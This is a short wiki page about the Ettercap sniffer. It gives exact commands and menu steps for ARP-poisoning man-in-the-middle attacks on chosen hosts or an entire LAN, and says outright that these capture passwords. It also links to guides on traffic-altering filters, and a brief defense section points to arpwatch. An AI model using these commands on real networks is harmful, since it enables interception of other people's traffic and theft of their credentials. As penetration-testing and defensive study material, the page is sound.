Lyceum

Ettercap Sniffer

Contents 1 Invoking ettercap 2 Filters 3 Man in the Middle Defense 4 References

Invoking ettercap

#ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.100/

Invokes with -T text interface, also available are -C curses and -G gui launches an arp poisoning attack between the two designated systems

A quick how to for text, curses and GUI modes can be found at:

http://ettercap.sourceforge.net/forum/viewtopic.php?t=2601&sid=d2a2f8fc10b949dbb0eea441202e79ed

Text mode: 
 This is the easiest to use (and I think the easiest on the eye!). To ARP Poison the whole LAN, capturing passwords as you go, use: 
 # ettercap -Tq -M arp:remote // 
 T = Text mode 
 q = quiet - without this you'll see the raw packets which can be noisy and annoying. 
 M = Man-In-The-Middle 
 arp: = ARP Poisoning 
 remote = forward packets destined for the WAN (Internet, whatever) 
 // = Empty target specification; i.e. all hosts 
 
 Use 'q' to quit. 
 
 If you want to only do hosts 10.0.0.3, 10.0.0.5, 10.0.0.6 and 10.0.0.7 then you could use: 
 # ettercap -Tq -M arp:remote /10.0.0.3,5-7/ 
 or 
 # ettercap -Tq -M arp:remote /10.0.0.3/ /10.0.0.5-7/ 
 
 Curses mode: 
 This is the one with the cursed interface. Use: 
 # ettercap -C 
 and then select the following options: 
 Sniff->Unified Sniffing 
 eth0 (or whatever you i/f spec is) 
 Hosts->Scan for hosts 
 Start->Start Sniffing 
 Mitm->Arp poisoning 
 remote 
 View->Connections 
 
 Mitm->Stop Mitm 
 Start->Stop Sniffing 
 Start->Exit 
 to quit. 
 
 GTK+ mode: 
 This is the one with the GTK+ interface. Use: 
 # ettercap -G 
 Then follow the same steps as for the Cursed interface. 
 
 Kev
_________________
_Please_ don't play on other people's networks; you wouldn't like it if they played on yours...

Filters

To make filters to inspect and re-craft traffic, see this example of making a filter in Ettercap:

http://www.irongeek.com/i.php?page=security/ettercapfilter

Also see the forums at remote exploit and the ettercap forum for additional information on filters:

http://forums.remote-exploit.org/showthread.php?t=7681

http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833

Man in the Middle Defense

http://www-nrg.ee.lbl.gov/

This site contains arpwatch, which allows you to monitor and log IP to arp mapping occuring on layer 2 and thus detect arp poisoning and Man in the Middle attacks.

#wget ftp://ftp.ee.lbl.gov/arpwatch.tar.gz

References

http://ettercap.sourceforge.net/forum/ Pretty good intro information here, etc.

http://www.propeller.com/viewstory/2007/02/17/penetration-testing-with-arp-spoofing-and-ettercap-and-how-to-fight-it/?url=http%3A%2F%2Fwww.roboguys.com%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D57%26Itemid%3D47&frame=true

http://www.securitypronews.com/securitypronews-24-20030623EtterCapARPSpoofingandBeyond.html